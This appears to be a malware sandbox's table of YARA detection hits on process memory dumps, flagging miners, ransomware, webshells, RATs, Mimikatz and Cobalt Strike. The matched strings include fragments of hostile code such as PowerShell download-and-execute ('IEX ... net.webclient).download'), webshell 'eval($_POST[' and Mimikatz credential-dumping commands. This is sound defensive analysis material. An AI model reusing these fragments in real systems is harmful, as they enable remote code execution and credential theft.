00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x33e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x33ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x345fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x34b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x34b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x18b28:$s1: stratum+tcp:// 0x195bc:$s1: stratum+tcp:// 0x1a968:$s1: stratum+tcp:// 0x1ac90:$s1: stratum+tcp://
00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6316141195.00000197A4068000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x27498:$s1: stratum+tcp:// 0x280b4:$s1: stratum+tcp://
00000024.00000003.6316141195.00000197A4068000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x1d676:$pdb1: \ADPassHunt\ 0x1d687:$pdb2: \ADPassHunt.pdb 0x1d69b:$s1: Usage: .\ADPassHunt.exe 0x1d6b7:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x1d6f7:$s3: [ADA] Searching for accounts with userpassword attribute 0x1d734:$s4: [GPP] Searching for passwords now
00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x329d9:$payload4: eval(gzuncompress(base64_decode 0x17a1a:$php_short: <? 0x17a83:$php_short: <? 0x17aec:$php_short: <? 0x17b55:$php_short: <? 0x17bbe:$php_short: <? 0x1c093:$php_short: <? 0x20d39:$php_short: <? 0x40b28:$php_short: <? 0x17a1a:$php_new2: <?php 0x17a83:$php_new2: <?php 0x17aec:$php_new2: <?php 0x17b55:$php_new2: <?php 0x17bbe:$php_new2: <?php
00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	Ammyy_Admin_AA_v3	Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe	Florian Roth	0x35759:$x1: S:\Ammyy\sources\target\TrService.cpp 0x35783:$x2: S:\Ammyy\sources\target\TrDesktopCopyRect.cpp 0x357b5:$x3: Global\Ammyy.Target.IncomePort 0x357d8:$x4: S:\Ammyy\sources\target\TrFmFileSys.cpp 0x35804:$x5: Please enter password for accessing remote computer 0x3568f:$s1: CreateProcess1()#3 %d error=%d 0x356b2:$s2: CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name. 0x356f6:$s3: ERROR: CreateProcessAsUser() error=%d, session=%d 0x3572c:$s4: ERROR: FindProcessByName('explorer.exe')
00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x13a35:$s1: "c" & "r" & "i" & "p" & "t"
00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x27867:$sa2: -enCodEdCoMMANd 0x8cf9:$sb1: -w hidden 0x27853:$sb3: -WindOwsTyLe HiddEN 0x27848:$sc2: -NOPrOFiLe 0x27830:$se3: -ExECutioNPolicy bYpAsS
00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x18011:$s1: stratum+tcp:// 0x1dc8f:$s1: stratum+tcp://
00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x301aa:$s1: WscRipt.sHeLl").Run
00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	vanquish_2	Webshells Auto-generated - file vanquish.exe	Yara Bulk Rule Generator by Florian Roth	0x959:$s2: Vanquish - DLL injection failed:
00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x143ef:$s1: "c" & "r" & "i" & "p" & "t"
00000024.00000003.6333426467.00000197A331E000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x10fa6:$a1: logKextPassKey 0x10fd4:$b1: logKext Password: 0x10fe9:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x10fa6:$c1: logKextPassKey
00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x266cb:$s1: stratum+tcp://
00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x44b1:$r1: p^o^w^e^r^s^h^E^L^L 0x44b1:$r2: p^o^w^e^r^s^h^E^L^L
00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x176d6:$s1: stratum+tcp:// 0x17771:$s1: stratum+tcp:// 0x178c8:$s1: stratum+tcp://
00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	MAL_unspecified_Jan18_1	Detects unspecified malware sample	Florian Roth	0x172dd:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x172b3:$s4: start /b "" cmd /c del "%%~f0"&exit /b 0x2d0b5:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x1730e:$s6: %s\%s.bat
00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	JoeSecurity_Vidar	Yara detected Vidar stealer	Joe Security
00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	JoeSecurity_ByteLocker	Yara detected ByteLocker Ransomware	Joe Security
00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	JoeSecurity_Artemon	Yara detected Artemon Ransomware	Joe Security
00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	JoeSecurity_lazparking	Yara detected LazParking Ransomware	Joe Security
00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x3dd6b:$substring: AAAAYInlM 0x3dd67:$pattern1: /OiCAAAAYInlM
00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x31e9:$x4: reflective_inject_dll 0x31e9:$x8: reflective_inject_dll 0x31e9:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x223f8:$payload7: eval(base64_decode( 0x22422:$payload7: eval(base64_decode( 0x223f3:$php_short: <? 0x2241c:$php_short: <? 0x32fd0:$php_short: <? 0x35509:$php_short: <? 0x223f3:$php_new2: <?php 0x2241c:$php_new2: <?php
00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	JoeSecurity_RevengeRAT	Yara detected RevengeRAT	Joe Security
00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	JoeSecurity_EvilGnomeRC5Key	Yara detected Linux EvilGnome RC5 key	unknown
00000024.00000003.6324954542.00000197A3C46000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x138b6:$s1: stratum+tcp://
00000024.00000003.6324954542.00000197A3C46000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6347606531.00000197A3C46000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x138b6:$s1: stratum+tcp://
00000024.00000003.6347606531.00000197A3C46000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x2ad91:$r2: p^ower^shell
00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x23c95:$new_php2: <?php 0x77af:$dynamic3: $U\xBF(' 0x2243e:$gen_bit_sus11: "cmd.exe 0x23085:$gen_bit_sus11: "cmd.exe 0x242d8:$gen_bit_sus12: %comspec% 0x23ca0:$gen_bit_sus46: shell_ 0x2a319:$gen_bit_sus47: Shell 0x2baa9:$gen_bit_sus47: Shell 0x5eab:$gen_bit_sus62: Cyber 0x5ed6:$gen_bit_sus62: Cyber 0x23c7b:$gen_much_sus8: WebShell 0x26a18:$gen_much_sus15: AntiVirus 0x2713c:$gen_much_sus15: AntiVirus 0x27f65:$gen_much_sus15: antivirus 0x28042:$gen_much_sus15: antivirus 0x28056:$gen_much_sus15: antivirus 0x2d83f:$gen_much_sus15: Antivirus 0x23c57:$gen_much_sus18: "unsafe 0x24600:$gen_much_sus24: exploit 0x227f0:$gen_much_sus25: Exploit 0x22ab1:$gen_much_sus25: Exploit
00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x23c3e:$payload_and_input1: eval(request. 0x23c3c:$tagasp_short1: <%e 0x23c61:$tagasp_short2: %> 0x23c3c:$tagasp_long13: <%ev 0x2a243:$jsp4: public 0x2a2a1:$jsp4: public
00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x329d9:$payload4: eval(gzuncompress(base64_decode 0x17a1a:$php_short: <? 0x17a83:$php_short: <? 0x17aec:$php_short: <? 0x17b55:$php_short: <? 0x17bbe:$php_short: <? 0x1c093:$php_short: <? 0x20d39:$php_short: <? 0x40b28:$php_short: <? 0x17a1a:$php_new2: <?php 0x17a83:$php_new2: <?php 0x17aec:$php_new2: <?php 0x17b55:$php_new2: <?php 0x17bbe:$php_new2: <?php
00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6299736334.00000197A2ED4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1c1ea:$s05: fce8890000006089e531d2648b52308b
00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp	webshell_php_obfuscated_encoding	PHP webshell obfuscated by encoding	Arnim Rupp	0xdd78:$enc_eval1: \x65\x76\x61\x6c\x28 0xdd78:$enc_eval2: \x65\x76\x61\x6c\x28 0x5676:$php_short: <? 0xc9ee:$php_short: <? 0xca79:$php_short: <? 0xcb04:$php_short: <? 0xfede:$php_short: <? 0x10d31:$php_short: <? 0x342da:$php_short: <? 0x3530f:$php_short: <? 0x36ab7:$php_short: <? 0x3a253:$php_short: <? 0x36ab7:$php_new2: <?php
00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x36ab7:$new_php2: <?php 0x363c2:$dynamic3: $_server[base64_decode(' 0xce4c:$gen_bit_sus11: "cmd.exe 0xced8:$gen_bit_sus11: "cmd.exe 0xcfef:$gen_bit_sus11: "cmd.exe 0xfdcb:$gen_bit_sus11: "cmd.exe 0x1ed35:$gen_bit_sus47: Shell 0x2e9d3:$gen_bit_sus47: Shell 0x212fd:$gen_bit_sus50: bypass 0x3621e:$gen_bit_sus50: bypass 0x36458:$gen_bit_sus59: 'cmd' 0x1dae3:$gen_bit_sus60: "execute" 0x1db1a:$gen_bit_sus60: "execute" 0x1c0ec:$gen_bit_sus62: Cyber 0x1c18c:$gen_bit_sus62: Cyber 0x34c4a:$gen_bit_sus69: $cmd 0xe1be:$gen_much_sus8: Webshell 0x25860:$gen_much_sus8: Webshell 0x35289:$gen_much_sus8: WebShell 0x35525:$gen_much_sus8: Webshell 0x36409:$gen_much_sus8: Webshell
00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0xdd78:$opbs77: \x65\x76\x61\x6c\x28 0x5676:$php_short: <? 0xc9ee:$php_short: <? 0xca79:$php_short: <? 0xcb04:$php_short: <? 0xfede:$php_short: <? 0x10d31:$php_short: <? 0x342da:$php_short: <? 0x3530f:$php_short: <? 0x36ab7:$php_short: <? 0x3a253:$php_short: <? 0x36ab7:$php_new2: <?php
00000024.00000003.6315364038.00000197A2FD4000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2abc1:$s1: stratum+tcp:// 0x2ac01:$s1: stratum+tcp://
00000024.00000003.6315364038.00000197A2FD4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6270634530.00000197A4698000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x35ec2:$sb1: -w hidden 0x35ecc:$sc1: -nop 0x35ed1:$se1: -ep bypass 0x7d49:$se3: -ExecutionPolicy Bypass
00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xfeb8:$s1: stratum+tcp://
00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	JoeSecurity_Cute	Yara detected Cute Ransomware	Joe Security
00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x329d9:$payload4: eval(gzuncompress(base64_decode 0x17a1a:$php_short: <? 0x17a83:$php_short: <? 0x17aec:$php_short: <? 0x17b55:$php_short: <? 0x17bbe:$php_short: <? 0x1c093:$php_short: <? 0x20d39:$php_short: <? 0x40b28:$php_short: <? 0x17a1a:$php_new2: <?php 0x17a83:$php_new2: <?php 0x17aec:$php_new2: <?php 0x17b55:$php_new2: <?php 0x17bbe:$php_new2: <?php
00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0xfebc:$payload7: eval(base64_decode( 0xd4d7:$php_short: <? 0xd507:$php_short: <? 0xdbf3:$php_short: <? 0x378dc:$php_short: <? 0x37d93:$php_short: <? 0x39caf:$php_short: <? 0x3a56b:$php_short: <? 0xd4d7:$php_new2: <?php 0x37d93:$php_new2: <?php 0x39caf:$php_new2: <?php 0x3a56b:$php_new2: <?php
00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	webshell_php_by_string_known_webshell	Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.	Arnim Rupp	0x394f7:$pbs7: pwnshell 0xd4d7:$php_short: <? 0xd507:$php_short: <? 0xdbf3:$php_short: <? 0x378dc:$php_short: <? 0x37d93:$php_short: <? 0x39caf:$php_short: <? 0x3a56b:$php_short: <? 0xd4d7:$php_new2: <?php 0x37d93:$php_new2: <?php 0x39caf:$php_new2: <?php 0x3a56b:$php_new2: <?php
00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager	Detects OilRig malware	Eyal Sela	0x2711b:$one3: srvCheckresponded
00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x29a49:$s1: stratum+tcp://
00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6328572357.00000197A4180000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0xd5e:$opbs48: se'.(32*2) 0x179f:$php_short: <? 0x184cc:$php_short: <? 0x179f:$php_new2: <?php
00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x3e14:$s12: sekurlsa::tickets
00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x3778:$payload_and_input2: execute(request( 0x320b:$tagasp_short1: <%v 0x3776:$tagasp_short1: <%e 0xd619:$tagasp_short1: <%R 0x29da0:$tagasp_short1: <%\x03 0x2aac4:$tagasp_short1: <%\xC0 0x378f:$tagasp_short2: %> 0xa4fc:$tagasp_short2: %> 0x24f8a:$tagasp_short2: %> 0x3776:$tagasp_long12: <%ex 0x17400:$jsp4: public 0x17787:$jsp4: public
00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	CVE_2018_4878_0day_ITW	unknown	unknown	0x2bce5:$known1: f:\work\flash\obfuscation\loadswf\src 0x2bce5:$known5: f:\work\flash\obfuscation\loadswf\src 0x2bcc2:$loader3: loadswf 0x2bcd3:$loader3: loadswf 0x2bcdd:$loader3: loadswf 0x2bcff:$loader3: loadswf 0xd6ed:$flash_magic: 46 57 53
00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x1d676:$pdb1: \ADPassHunt\ 0x1d687:$pdb2: \ADPassHunt.pdb 0x1d69b:$s1: Usage: .\ADPassHunt.exe 0x1d6b7:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x1d6f7:$s3: [ADA] Searching for accounts with userpassword attribute 0x1d734:$s4: [GPP] Searching for passwords now
00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0xfeb1:$x1: IEX ((new-object net.webclient).download 0xff04:$x1: IEX ((new-object net.webclient).download 0xff58:$x1: IEX ((new-object net.webclient).download 0xffb9:$x1: IEX ((new-object net.webclient).download
00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	webshell_php_generic	php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings	Arnim Rupp	0x774d:$php_short: <? 0x1f1a6:$php_short: <? 0x1f1a6:$php_new2: <?php 0x1f1b3:$inp4: _POST[ 0x17554:$cpayload1: eval(" 0x17605:$cpayload1: eval(" 0x1f1ad:$cpayload1: eval($ 0x3d502:$cpayload1: eval(f 0x368d9:$cpayload2: exec(" 0x7dd8:$gen_bit_sus1: :eval} 0xeb85:$gen_bit_sus10: "cmd" 0xa4f9:$gen_bit_sus12: %comspec% 0xff94:$gen_bit_sus46: shell_ 0x2cb0:$gen_bit_sus47: Shell 0x12f76:$gen_bit_sus47: Shell 0x12fb8:$gen_bit_sus47: Shell 0x12fd2:$gen_bit_sus47: Shell 0x13f6d:$gen_bit_sus47: Shell 0x3ee98:$gen_bit_sus47: Shell 0x31365:$gen_bit_sus61: /bin/sh 0xbd68:$gen_bit_sus66: whoami
00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	webshell_php_generic_eval	Generic PHP webshell which uses any eval/exec function in the same line with user input	Arnim Rupp	0x1f1ad:$geval: eval($_POST
00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x1f1a6:$new_php2: <?php 0xb0ab:$dynamic1: $duration($ 0xb0b5:$dynamic1: $calc($ 0xb0d7:$dynamic1: $bytes($ 0xb0de:$dynamic1: $calc($ 0xb0fe:$dynamic1: $calc($ 0xb524:$dynamic1: $nick($ 0x7dd8:$gen_bit_sus1: :eval} 0xeb85:$gen_bit_sus10: "cmd" 0xa4f9:$gen_bit_sus12: %comspec% 0xff94:$gen_bit_sus46: shell_ 0x2cb0:$gen_bit_sus47: Shell 0x12f76:$gen_bit_sus47: Shell 0x12fb8:$gen_bit_sus47: Shell 0x12fd2:$gen_bit_sus47: Shell 0x13f6d:$gen_bit_sus47: Shell 0x3ee98:$gen_bit_sus47: Shell 0x31365:$gen_bit_sus61: /bin/sh 0xbd68:$gen_bit_sus66: whoami 0x2e6a:$gen_much_sus25: Exploit 0x3085:$gen_much_sus25: Exploit
00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x1f1cc:$payload_and_input2: execute request( 0x1f1ca:$tagasp_short1: <%e 0x1c5a8:$tagasp_short2: %> 0x1f1e9:$tagasp_short2: %> 0x1f1ca:$tagasp_long12: <%ex
00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	ChinaChopper_Generic	China Chopper Webshells - PHP and ASPX	Florian Roth	0x1f1a8:$php: php @eval($_POST[
00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	JoeSecurity_mock	Yara detected Mock Ransomware	Joe Security
00000024.00000003.6278908021.00000197A4866000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x12e1d:$s1: WScript.Shell").run
00000024.00000003.6278908021.00000197A4866000.00000004.00000001.sdmp	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x2ff92:$a: XTREME 0x2ffa4:$a: XTREME 0x2ffa4:$b: XTREMEBINDER
